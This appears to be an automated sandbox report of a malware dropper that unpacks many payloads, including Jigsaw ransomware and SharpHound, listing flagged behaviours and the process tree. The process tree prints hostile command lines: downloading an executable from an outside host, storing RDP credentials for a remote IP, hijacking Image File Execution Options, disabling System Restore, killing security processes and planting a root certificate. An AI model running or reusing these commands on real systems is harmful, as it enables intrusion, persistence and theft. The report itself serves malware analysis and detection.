chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 50003100000000006d597cbd100046696c6573003c0009000400efbe6d5968bd6d597dbd2e000000daaa0200000046000000000000000000000000000000cb225800460069006c0065007300000014000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e80922b16d365937a46956b92703aca08af0000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 chrome.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 chrome.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Processes:
cookie250.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 cookie250.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 cookie250.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5148 schtasks.exe 4064 schtasks.exe 6456 schtasks.exe 6784 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 80 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
mstsc.exepid process 4668 mstsc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
wmild.exechrome.exepowershell.exerundll32.exe337368602.exe686511152.exepid process 5484 wmild.exe 5484 wmild.exe 3620 chrome.exe 3620 chrome.exe 1904 powershell.exe 1904 powershell.exe 1904 powershell.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 4964 337368602.exe 4964 337368602.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 3660 686511152.exe 3660 686511152.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe 1240 rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
rundll32.exepid process 1240 rundll32.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
chrome.exemsedge.exepid process 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
sysarddrvs.exesysvplervcs.exepid process 4256 sysarddrvs.exe 396 sysvplervcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zFM.exe4363463463464363463463463.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesubin.exesubin.exesubin.exesubin.exeStatement-415322024.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exechrome.exedescription pid process Token: SeRestorePrivilege 5332 7zFM.exe Token: 35 5332 7zFM.exe Token: SeSecurityPrivilege 5332 7zFM.exe Token: SeDebugPrivilege 1888 4363463463464363463463463.exe Token: SeDebugPrivilege 4160 taskkill.exe Token: SeDebugPrivilege 2252 taskkill.exe Token: SeDebugPrivilege 2360 taskkill.exe Token: SeDebugPrivilege 2328 taskkill.exe Token: SeDebugPrivilege 4960 taskkill.exe Token: SeSecurityPrivilege 2108 subin.exe Token: SeBackupPrivilege 2108 subin.exe Token: SeRestorePrivilege 2108 subin.exe Token: SeRestorePrivilege 2108 subin.exe Token: SeTakeOwnershipPrivilege 2108 subin.exe Token: SeChangeNotifyPrivilege 2108 subin.exe Token: SeDebugPrivilege 2108 subin.exe Token: SeSecurityPrivilege 5504 subin.exe Token: SeBackupPrivilege 5504 subin.exe Token: SeRestorePrivilege 5504 subin.exe Token: SeRestorePrivilege 5504 subin.exe Token: SeTakeOwnershipPrivilege 5504 subin.exe Token: SeChangeNotifyPrivilege 5504 subin.exe Token: SeDebugPrivilege 5504 subin.exe Token: SeSecurityPrivilege 1428 subin.exe Token: SeBackupPrivilege 1428 subin.exe Token: SeRestorePrivilege 1428 subin.exe Token: SeRestorePrivilege 1428 subin.exe Token: SeTakeOwnershipPrivilege 1428 subin.exe Token: SeChangeNotifyPrivilege 1428 subin.exe Token: SeDebugPrivilege 1428 subin.exe Token: SeSecurityPrivilege 1432 subin.exe Token: SeBackupPrivilege 1432 subin.exe Token: SeRestorePrivilege 1432 subin.exe Token: SeRestorePrivilege 1432 subin.exe Token: SeTakeOwnershipPrivilege 1432 subin.exe Token: SeChangeNotifyPrivilege 1432 subin.exe Token: SeDebugPrivilege 1432 subin.exe Token: SeDebugPrivilege 4732 Statement-415322024.exe Token: SeDebugPrivilege 3428 taskkill.exe Token: SeDebugPrivilege 128 taskkill.exe Token: SeDebugPrivilege 3964 taskkill.exe Token: SeDebugPrivilege 5832 taskkill.exe Token: SeDebugPrivilege 3636 taskkill.exe Token: SeDebugPrivilege 4728 taskkill.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe Token: SeShutdownPrivilege 3620 chrome.exe Token: SeCreatePagefilePrivilege 3620 chrome.exe -
Suspicious use of FindShellTrayWindow 57 IoCs
Processes:
7zFM.exewmild.exemstsc.exechrome.exemsedge.exepid process 5332 7zFM.exe 5332 7zFM.exe 5484 wmild.exe 4668 mstsc.exe 4668 mstsc.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
chrome.exemsedge.exepid process 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 3620 chrome.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe 1724 msedge.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
ASUFER.exewmild.exeITplan.exemstsc.exechrome.exe%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exett.exe11.exesoftina.exeJAVA_V3.exea.exegawdth.exeq1wnx5ir.execlamer.exelofsawd.exeserver.exesmell-the-roses.exepid process 5716 ASUFER.exe 5484 wmild.exe 5964 ITplan.exe 4668 mstsc.exe 6044 chrome.exe 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5436 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 4316 tt.exe 4480 11.exe 5876 softina.exe 3668 JAVA_V3.exe 4596 a.exe 1140 gawdth.exe 5408 q1wnx5ir.exe 4996 clamer.exe 868 lofsawd.exe 3924 server.exe 5288 smell-the-roses.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exeASUFER.execmd.exedescription pid process target process PID 1888 wrote to memory of 3100 1888 4363463463464363463463463.exe SharpHound.exe PID 1888 wrote to memory of 3100 1888 4363463463464363463463463.exe SharpHound.exe PID 1888 wrote to memory of 5716 1888 4363463463464363463463463.exe ASUFER.exe PID 1888 wrote to memory of 5716 1888 4363463463464363463463463.exe ASUFER.exe PID 1888 wrote to memory of 5716 1888 4363463463464363463463463.exe ASUFER.exe PID 5716 wrote to memory of 3612 5716 ASUFER.exe cmd.exe PID 5716 wrote to memory of 3612 5716 ASUFER.exe cmd.exe PID 5716 wrote to memory of 3612 5716 ASUFER.exe cmd.exe PID 3612 wrote to memory of 4160 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 4160 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 4160 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2252 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2252 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2252 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2360 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2360 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2360 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2328 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2328 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 2328 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 4960 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 4960 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 4960 3612 cmd.exe taskkill.exe PID 3612 wrote to memory of 1356 3612 cmd.exe reg.exe PID 3612 wrote to memory of 1356 3612 cmd.exe reg.exe PID 3612 wrote to memory of 1356 3612 cmd.exe reg.exe PID 3612 wrote to memory of 5520 3612 cmd.exe reg.exe PID 3612 wrote to memory of 5520 3612 cmd.exe reg.exe PID 3612 wrote to memory of 5520 3612 cmd.exe reg.exe PID 3612 wrote to memory of 1924 3612 cmd.exe reg.exe PID 3612 wrote to memory of 1924 3612 cmd.exe reg.exe PID 3612 wrote to memory of 1924 3612 cmd.exe reg.exe PID 3612 wrote to memory of 580 3612 cmd.exe reg.exe PID 3612 wrote to memory of 580 3612 cmd.exe reg.exe PID 3612 wrote to memory of 580 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2244 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2244 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2244 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2292 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2292 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2292 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2224 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2224 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2224 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2788 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2788 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2788 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2556 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2556 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2556 3612 cmd.exe reg.exe PID 3612 wrote to memory of 2108 3612 cmd.exe subin.exe PID 3612 wrote to memory of 2108 3612 cmd.exe subin.exe PID 3612 wrote to memory of 2108 3612 cmd.exe subin.exe PID 3612 wrote to memory of 5504 3612 cmd.exe subin.exe PID 3612 wrote to memory of 5504 3612 cmd.exe subin.exe PID 3612 wrote to memory of 5504 3612 cmd.exe subin.exe PID 3612 wrote to memory of 1428 3612 cmd.exe subin.exe PID 3612 wrote to memory of 1428 3612 cmd.exe subin.exe PID 3612 wrote to memory of 1428 3612 cmd.exe subin.exe PID 3612 wrote to memory of 5956 3612 cmd.exe sc.exe PID 3612 wrote to memory of 5956 3612 cmd.exe sc.exe PID 3612 wrote to memory of 5956 3612 cmd.exe sc.exe PID 3612 wrote to memory of 1432 3612 cmd.exe subin.exe PID 3612 wrote to memory of 1432 3612 cmd.exe subin.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3352
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5332
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\Desktop\Files\SharpHound.exe"C:\Users\Admin\Desktop\Files\SharpHound.exe"3⤵
- Executes dropped EXE
PID:3100
-
-
C:\Users\Admin\Desktop\Files\ASUFER.exe"C:\Users\Admin\Desktop\Files\ASUFER.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\ehome\SER.bat" "4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ipz2.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im nvidsrv.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im safesurf.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im surfguard.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4960
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f5⤵
- System Location Discovery: System Language Discovery
PID:1356
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:5520
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f5⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:580
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f5⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f5⤵PID:2292
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:2224
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f5⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2556
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\windows\ehome\sc.exesc stop xStarter5⤵
- Executes dropped EXE
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5956
-
-
C:\Windows\SysWOW64\subin.exesubin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1432
-
-
C:\windows\ehome\wmild.exewmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5484
-
-
C:\Windows\SysWOW64\reg.exereg delete HKLM\SOFTWARE\JetSwap /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5748
-
-
C:\Windows\SysWOW64\reg.exereg delete HKCU\SOFTWARE\JetSwap /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5928
-
-
C:\Windows\SysWOW64\net.exenet stop xStarter5⤵
- System Location Discovery: System Language Discovery
PID:3592 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xStarter6⤵
- System Location Discovery: System Language Discovery
PID:5776
-
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f5⤵
- Event Triggered Execution: Image File Execution Options Injection
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f5⤵
- Event Triggered Execution: Image File Execution Options Injection
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\reg.exeReg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f5⤵
- Event Triggered Execution: Image File Execution Options Injection
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f5⤵
- System Location Discovery: System Language Discovery
PID:1424
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f5⤵
- System Location Discovery: System Language Discovery
PID:5428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wuau𫲮exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wuapp.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im waagent.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wups.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wudriver.exe /T5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im stub.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\net.exenet stop xStarter5⤵PID:4476
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop xStarter6⤵
- System Location Discovery: System Language Discovery
PID:2236
-
-
-
C:\windows\ehome\sc.exesc stop xStarter5⤵
- Executes dropped EXE
- Launches sc.exe
PID:5040
-
-
-
-
C:\Users\Admin\Desktop\Files\Statement-415322024.exe"C:\Users\Admin\Desktop\Files\Statement-415322024.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 9684⤵
- Program crash
PID:3508
-
-
-
C:\Users\Admin\Desktop\Files\ITplan.exe"C:\Users\Admin\Desktop\Files\ITplan.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5964 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76D.tmp\76E.tmp\76F.bat C:\Users\Admin\Desktop\Files\ITplan.exe"4⤵PID:4752
-
C:\Windows\system32\cmdkey.execmdkey /generic: 211.168.94.177 /user:"exporter" /pass:"09EC^2n09"5⤵PID:3112
-
-
C:\Windows\system32\mstsc.exemstsc /v: 211.168.94.1775⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4668
-
-
-
-
C:\Users\Admin\Desktop\Files\Jigsaw.exe"C:\Users\Admin\Desktop\Files\Jigsaw.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1860 -
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\Files\Jigsaw.exe4⤵
- Deletes itself
- Executes dropped EXE
- Drops file in Program Files directory
PID:2848
-
-
-
C:\Users\Admin\Desktop\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"C:\Users\Admin\Desktop\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:5436
-
-
C:\Users\Admin\Desktop\Files\cookie250.exe"C:\Users\Admin\Desktop\Files\cookie250.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:5728
-
-
C:\Users\Admin\Desktop\Files\tt.exe"C:\Users\Admin\Desktop\Files\tt.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4316 -
C:\Windows\sysmablsvr.exeC:\Windows\sysmablsvr.exe4⤵
- Modifies security service
